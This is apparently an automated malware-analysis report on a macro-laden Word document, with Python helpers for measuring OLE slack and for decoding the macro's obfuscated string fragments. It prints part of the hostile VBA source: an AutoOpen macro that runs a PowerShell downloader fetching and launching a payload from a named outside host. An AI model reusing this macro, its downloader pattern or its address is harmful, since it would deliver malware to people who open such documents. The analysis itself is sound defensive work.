Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious OLE document containing VBA macros. An AutoOpen macro runs as soon as the document is opened with macros enabled, and a critical heuristic fired on a Shell() call, the usual way a macro hands a downloaded payload or a command line to the operating system. The macro is heavily obfuscated: the command it launches is held as Mid() slices of junk-padded string literals, and the slices themselves are broken up by concatenation noise ('+', EUO+EUO, kKc+kKc) that the launched PowerShell normalises with chained .rEPlaCe() calls (one visible fragment maps the token EUO to [char]39, a single quote). The readable fragments include a foreach over a list of addresses, a .DownloadFile(...) call, Invoke-Item on the saved file, and a try/catch that breaks out of the loop once a download succeeds and otherwise writes the exception to the console. One address in that list reconstructs to http://www.achar-tehran.com/aIwM/ and is the likely source of the second-stage payload; the other addresses are only partially visible in the preview.
Heuristics (5)
- VBA macros detected (medium; 2 related findings) [OLE_VBA_MACROS]: the document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: the macro calls Shell(), which executes an arbitrary command line.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: an AutoOpen procedure runs automatically when the document is opened.
- OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]: the OLE file is 130,731 bytes but its declared streams total only 24,491 bytes; 106,240 bytes (81%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Slack can also be left behind by ordinary editing, since sectors of deleted or rewritten streams are not reclaimed, so treat the figure as a pointer to carve and inspect the region rather than as a detection on its own.
- Embedded URL (info) [EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label records which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in any document with embedded drawing data and is benign; the macro's download address does not appear here because it exists only as scattered string fragments that are assembled at run time.
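The slack figure above can be reproduced from the container itself. The following Python is an added example, not the analyzer's code: it parses the CFB/OLE2 header and FAT, sums the stream sizes declared in the directory, and counts the sectors that no FAT entry allocates. Note that the report's 106,240 bytes is exactly 130,731 minus 24,491, i.e. file size minus declared stream bytes, a figure that also counts the header, FAT and directory sectors as unaccounted for; the example reports that number alongside the stricter FAT-based one. The sample container is constructed inside the block (a root entry, one 4,096-byte stream, and 30 trailing sectors that nothing allocates). Only the version 3, 512-byte-sector layout is handled, and DIFAT sectors beyond the 109 header entries are not followed.

```python
"""Added example (not the analyzer's code): OLE_SLACK_ANOMALY accounting on a
Compound File Binary (CFB/OLE2) container, v3 layout (512-byte sectors) only."""
import struct

ENDOFCHAIN, FREESECT, FATSECT = 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD
NOSTREAM = 0xFFFFFFFF
HEADER_SIZE = 512
MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def read_fat(data, sector_size):
    """Concatenate the FAT sectors named in the header DIFAT (first 109 only)."""
    n_fat = struct.unpack_from("<I", data, 44)[0]
    difat = struct.unpack_from("<109I", data, 76)
    fat = []
    for sec in difat[:n_fat]:
        off = HEADER_SIZE + sec * sector_size
        fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data, off))
    return fat


def chain(fat, start):
    """Follow a FAT chain; stop on loops or out-of-range links (corrupt tables)."""
    seen, sec = [], start
    while sec not in (ENDOFCHAIN, FREESECT) and sec < len(fat) and sec not in seen:
        seen.append(sec)
        sec = fat[sec]
    return seen


def analyze_cfb(data):
    if data[:8] != MAGIC:
        raise ValueError("not an OLE2/CFB container")
    sector_size = 1 << struct.unpack_from("<H", data, 30)[0]
    fat = read_fat(data, sector_size)
    # Every sector after the 512-byte header, counting a partial last one.
    total_sectors = -(-(len(data) - HEADER_SIZE) // sector_size)
    allocated = sum(1 for i in range(min(total_sectors, len(fat))) if fat[i] != FREESECT)
    # Directory entries are 128 bytes each in the chain that starts at header+48.
    first_dir = struct.unpack_from("<I", data, 48)[0]
    declared, names = 0, []
    for sec in chain(fat, first_dir):
        base = HEADER_SIZE + sec * sector_size
        for off in range(base, base + sector_size, 128):
            name_len, obj_type = struct.unpack_from("<HB", data, off + 64)
            if obj_type != 2:  # 2 = stream; 1 storage, 5 root, 0 unused
                continue
            names.append(data[off:off + name_len - 2].decode("utf-16-le"))
            declared += struct.unpack_from("<I", data, off + 120)[0]  # low 32 bits in v3
    unallocated = (total_sectors - allocated) * sector_size
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "stream_names": names,
        "unaccounted_bytes": len(data) - declared,   # the report's crude figure
        "unallocated_bytes": unallocated,            # sectors no FAT entry owns
        "unallocated_pct": round(100 * unallocated / len(data)),
    }


def build_sample_cfb(junk_sectors=30):
    """Constructed sample: sector 0 FAT, 1 directory, 2..9 one 4096-byte stream,
    then `junk_sectors` sectors that the FAT marks free (the slack)."""
    ss = 512
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 10)) + [ENDOFCHAIN]
    fat += [FREESECT] * (ss // 4 - len(fat))

    def entry(name, obj_type, start, size, child=NOSTREAM):
        n = name.encode("utf-16-le") + b"\x00\x00"
        e = bytearray(128)
        e[:len(n)] = n
        struct.pack_into("<HBB", e, 64, len(n), obj_type, 1)
        struct.pack_into("<III", e, 68, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 116, start, size)
        return bytes(e)

    directory = entry("Root Entry", 5, ENDOFCHAIN, 0, child=1) + entry("Payload", 2, 2, 4096)
    directory += bytes(ss - len(directory))
    header = bytearray(ss)
    header[:8] = MAGIC
    struct.pack_into("<HHHHH", header, 24, 0x3E, 3, 0xFFFE, 9, 6)   # versions, order, shifts
    struct.pack_into("<IIII", header, 44, 1, 1, 0, 4096)           # n_fat, first dir, txn, cutoff
    struct.pack_into("<IIII", header, 60, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", header, 76, 0, *[FREESECT] * 108)     # DIFAT: FAT is sector 0
    body = struct.pack("<128I", *fat) + directory + b"A" * 4096 + b"\x90" * (ss * junk_sectors)
    return bytes(header) + body


if __name__ == "__main__":
    print(analyze_cfb(build_sample_cfb()))
```

Run it against a real file with `analyze_cfb(open(path, "rb").read())`; when `unallocated_bytes` is large, carve the free sectors (those whose FAT entry is FREESECT) and inspect them for XOR-encoded or high-entropy content before concluding anything.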
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 47,778 bytes | 9f353c8cde53f31edd1517d0221c19799e869699d56276522cbec577563d3a4f |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EQkYTQZMUP"
Function jKwnsPwmjVchZ()
FNHINDLsQtI = Array(UCase("ivdYnBDiBTY" + "mcLmbQYLzEiYa" + "uzbdMwslP" + "dkHUofWX" + "lSqdKjnkijZQE"))
dwlYZTcl = Mid("1SRwLJuJFlJON6pNCiCz3DXZa071smEUOKcspemenankKc+kKcg.comkKc+EUO+EUOkKc/kKc+kKcMAkKc+kKchq/,'+'h'+'tt'+'p:/kKc+EUO+EUOkKc/wwwEUO+EUO.achar-tehrkKc+kKc'+'an.kKEUO+EUOc+kKccom/aIwM/,hkKc+kKctjwM5SpKvv", 31, 157)
KllJsiVCR = Array(UCase("UdGPpCpjd" + "EWPtjKuEIcV" + "ETNmYoQEnRuEG" + "uVsJXrRi" + "TpzLDIu"))
UBXjujihTP = Array(UCase("ZHGCXGbABMDJqI" + "XTiGfpv" + "TRtZMKE" + "rYmiNicwRRkQd" + "AtijLMrJZId"))
CkFNZ = Array(UCase("ULDzduUi" + "jrGZdlaWjtzP" + "LLLTdAL" + "qcVpNnaFfBWqz" + "CMhldOhJd"))
JOTsD = Mid("VzdCvjRhsdEwBjqUjlw02),[StrIng][cH'+'ar]39).rePlaCE(([cHar'+']HpE7hIb", 21, 42)
RNzvrEjzau = Array(UCase("mlihPqz" + "LlEaqorjpN" + "iZsQAuj" + "rwhzdEJvrUjCtT" + "PPoDpWV"))
fzSmMIjcdBi = Array(UCase("sOzsnKQTSv" + "PkjQwARBrdZIt" + "wmsXzJhw" + "zzohRVk" + "XBZmcwV"))
rJzzWcXfNGz = Array(UCase("QciRRwmNTkBFms" + "DcIXcVXiuVzsG" + "ibSVodw" + "qMvukINKAPWZ" + "PEjtZsukv"))
qvocsBluIjI = Mid("0pEFBti4HVG9azzbkEUO+EUOKcreak;}catch{writkKc+kKce-hoskKc+kKctkKc+'+'kKc RJPkKc+kKc_.'+'ExckK6kK0Z9ZFnwBuPTZkDr", 17, 77)
WIlRmGqb = Array(UCase("NQHlsTFGjpY" + "wVmMQklRJS" + "fGbBHTWWnWrjtZ" + "HdthzczMF" + "PNWrMEV"))
FKYhAa = Array(UCase("FjNoIjjwP" + "VlwchkOVjUkVj" + "PXlcOkCwvupO" + "UEbRRGjzdH" + "LpdZAbh"))
MmqXD = Array(UCase("phEWwziskn" + "KzJPYzW" + "FwzkMvIzNV" + "CiAQQjnEkK" + "fijzlnMBQ"))
NkljcRmATlo = Mid("5zJEXtcTpKcEUO+EUOskKc+kKcukKc+kKcsa.ckKc+kKcok'+'Kc+kEU'+'O+E'+'UOKcm/wRhkKcEUbS", 10, 70)
dcXICSd = Array(UCase("zfYlzGjfoXqB" + "TNuQIDSPzkmPh" + "YGczUMFOr" + "TdKhbuamGRsbjI" + "XPUCvmVQpKYLZ"))
wwwNAqmBhX = Array(UCase("BrUaszrbq" + "RWNlUJi" + "fkslJrQSDNKUl" + "FJBrjqYm" + "duKwIQvibFTVfU"))
ubbOXHJiatL = Array(UCase("hCYlviFzOsPw" + "ZMVAWCREEQ" + "vjkDTPijMaWdZ" + "WiUwbwzN" + "YAdaUCGicmkq"))
zcQGdF = Mid("qmCe(([CHar]69+[CHar]85+[CHar]79),[strINg][CHar]39).rEPlaCe(([CHar]114+[CHar]104+[CHar]103),'|').rEPlaCe('OAE',[strCwhmjzqQiLzbDr4WS8kNMBjIDIj3Tdd", 3, 113)
OqVtNUqVTrq = Array(UCase("hcJZtdQVP" + "REkcdsU" + "oPrzvHBHiiPSqZ" + "lJDjwsSMZvqrM" + "CwMwbqFY"))
vSdAELoXk = Array(UCase("zCizJfmtD" + "vtzXzGdRqiwM" + "poOhGwt" + "pQIhRTcpSbpVS" + "jUiIYzUtHQlz"))
TRvwhH = Array(UCase("YOTJTwuNGkhD" + "QiIhDPOU" + "wibJkBDAMsZM" + "zJSjitPfNK" + "nrPGwzlhN"))
lvTrViazirS = Mid("wp0nZSc+kKc--prppwkVGij5TbPZw", 7, 8)
DJQitoWLZD = Array(UCase("LvzfwJqFdrqjm" + "bYHIqkI" + "tCzXuXwJ" + "vSfQuUvsLcbDd" + "cmwsUzHuOfDBv"))
YqwapYB = Array(UCase("SohKOtKFXpizw" + "zPUlUFGiTKWt" + "zCNGrwjfUkZQ" + "FZqVnnuhHjfAMI" + "jUWoUIMDKimA"))
VVtpFZzvSo = Array(UCase("MKWvUYNO" + "anhzEcOfamVlDL" + "bOYzobHNApfNc" + "AjJVjBTd" + "CCCdzrmYI"))
fcDzGMRmkD = Mid("zKYn74hC4VVk1H0Rs0KPvcQYIanC6{try{RJPk'+'Kc+k'+'Kcfranc.Downk'+'K'+'c+kKcloadFileEUO+EUO(RJEUO+EUOPabckKc+k'+'K'+'c.ToString(),kKc+kKc '+'RJPhuakKc+kKcskKc+kKc)kKc+kKc;kKc+k'+'KcInvoke-Item(RJPhuas)kKc+kKc;bkKc+YNrvGpv", 30, 182)
BaZAmn = Array(UCase("CiiuUVAjs" + "XizDpThGfqzvzN" + "wrsWjnAmifcE" + "jrIArXzFVEXk" + "bHKQHfQJYdI"))
KwftlbN = Array(UCase("dTGzQZVSahJZPl" + "ZGLPWKZwzV" + "mwJWNRWOzpujsw" + "itwHdnQH" + "lbImnDVJiW"))
ACqkqwtWXKd = Array(UCase("ZpMtXwLWB" + "abRUqQsZiTJOY" + "SQHqIDW" + "iHMpOzoLiDKfsr" + "vbPdsDRJKQ"))
uJEhzf = Mid("AFhjLRNWzCLBwc+k'+'Kcch(RJPabkKc+kKcc in RJPkKc+kKcbkKc+kKccd)Aq", 14, 49)
TpzhjBq = Array(UCase("WIDTsCAljfZST" + "bjCqrGVq" + "lmIkavUlCWIo" + "pcOamfasLI" + "aLWTTmPRfWShk"))
fbBJmSKaq = Array(UCase("bHpUOwUf" + "JHABtlSoFEtIau" + "PtZirNwB" + "DXhWJpLLNu" + "naNjHlcE"))
fWFHuRt = Array(UCase("MpIVdEQqjThwQ" + "bzAiCavH" + "VUirqPbSQ" + "GiLsAspniCArM" + "XWRNUnWsFbmB"))
SVZSdY = Mid("XJ4jzTAqlb-JOiN'') ( ('((EUO. ( Zk5pshO'+'
... (truncated)
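The Mid() fragments in the preview can be decoded mechanically. The following Python is an added example, not the analyzer's or the sample's own code: it applies VBA Mid() semantics to each `name = Mid("...", start, length)` line, strips the concatenation noise, and searches the result for complete URLs. Assumptions: '+' and EUO+EUO are concatenation markers (the zcQGdF fragment maps EUO to [char]39, a single quote, which supports this); kKc+kKc is assumed to be a third marker whose replace() call lies in the truncated part; the token RJP, which sits wherever a PowerShell variable sigil would, is left untouched rather than guessed. The sample lines are copied from the preview above; the final join order of the fragments is in the truncated part, so the example decodes each fragment on its own and does not reassemble the full command.

```python
"""Added example (not code from the analyzer or from the sample): decode the
Mid()-sliced PowerShell fragments in the extracted macro.

Assumptions:
  * each `name = Mid("<junk><fragment><junk>", start, length)` line yields one
    fragment (VBA Mid is 1-based; a start past the end yields "");
  * "'+'" and "EUO+EUO" are string-concatenation noise (the zcQGdF fragment
    replaces EUO with [char]39, a single quote); "kKc+kKc" is assumed to be a
    third such marker whose replace() call lies in the truncated part;
  * fragments are joined later (the -JOiN'' in SVZSdY), so a decoded fragment
    may begin or end inside a marker, leaving stubs such as "EUOKc" / "kKcEU".
"""
import re

MID_RE = re.compile(r'^\s*(\w+)\s*=\s*Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)\s*$')
# Outermost layer first: the literal '+' joins, then the two replace()-based layers.
NOISE = ["'+'", "EUO+EUO", "kKc+kKc"]
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, returns "" when start is beyond the string."""
    if start < 1 or length < 0:
        raise ValueError("Mid() arguments must be positive")
    return s[start - 1:start - 1 + length]


def strip_noise(fragment):
    for token in NOISE:
        fragment = fragment.replace(token, "")
    return fragment


def extract_fragments(macro_source):
    """Map variable name -> decoded fragment, in macro order."""
    fragments = {}
    for line in macro_source.splitlines():
        m = MID_RE.match(line)
        if m:
            name, literal, start, length = m.groups()
            fragments[name] = strip_noise(vba_mid(literal, int(start), int(length)))
    return fragments


def find_urls(fragments):
    """URLs complete inside a single fragment; partial hosts are not guessed."""
    return [u for frag in fragments.values() for u in URL_RE.findall(frag)]


# Constructed sample: the Mid() lines copied verbatim from the macro preview.
SAMPLE = r'''
dwlYZTcl = Mid("1SRwLJuJFlJON6pNCiCz3DXZa071smEUOKcspemenankKc+kKcg.comkKc+EUO+EUOkKc/kKc+kKcMAkKc+kKchq/,'+'h'+'tt'+'p:/kKc+EUO+EUOkKc/wwwEUO+EUO.achar-tehrkKc+kKc'+'an.kKEUO+EUOc+kKccom/aIwM/,hkKc+kKctjwM5SpKvv", 31, 157)
JOTsD = Mid("VzdCvjRhsdEwBjqUjlw02),[StrIng][cH'+'ar]39).rePlaCE(([cHar'+']HpE7hIb", 21, 42)
qvocsBluIjI = Mid("0pEFBti4HVG9azzbkEUO+EUOKcreak;}catch{writkKc+kKce-hoskKc+kKctkKc+'+'kKc RJPkKc+kKc_.'+'ExckK6kK0Z9ZFnwBuPTZkDr", 17, 77)
NkljcRmATlo = Mid("5zJEXtcTpKcEUO+EUOskKc+kKcukKc+kKcsa.ckKc+kKcok'+'Kc+kEU'+'O+E'+'UOKcm/wRhkKcEUbS", 10, 70)
zcQGdF = Mid("qmCe(([CHar]69+[CHar]85+[CHar]79),[strINg][CHar]39).rEPlaCe(([CHar]114+[CHar]104+[CHar]103),'|').rEPlaCe('OAE',[strCwhmjzqQiLzbDr4WS8kNMBjIDIj3Tdd", 3, 113)
fcDzGMRmkD = Mid("zKYn74hC4VVk1H0Rs0KPvcQYIanC6{try{RJPk'+'Kc+k'+'Kcfranc.Downk'+'K'+'c+kKcloadFileEUO+EUO(RJEUO+EUOPabckKc+k'+'K'+'c.ToString(),kKc+kKc '+'RJPhuakKc+kKcskKc+kKc)kKc+kKc;kKc+k'+'KcInvoke-Item(RJPhuas)kKc+kKc;bkKc+YNrvGpv", 30, 182)
uJEhzf = Mid("AFhjLRNWzCLBwc+k'+'Kcch(RJPabkKc+kKcc in RJPkKc+kKcbkKc+kKccd)Aq", 14, 49)
'''

if __name__ == "__main__":
    frags = extract_fragments(SAMPLE)
    for name, frag in frags.items():
        print(f"{name:12s} {frag}")
    print("URLs:", find_urls(frags))
```

Feed it the whole macros.bas to decode every Mid() line at once; the pieces then read as a PowerShell downloader (foreach over an address list, DownloadFile, Invoke-Item, try/catch with break). Hosts that are cut in half by a fragment boundary, such as the "...sa.com/wRh" stub in NkljcRmATlo, stay partial until the fragments are joined in the order the truncated tail specifies.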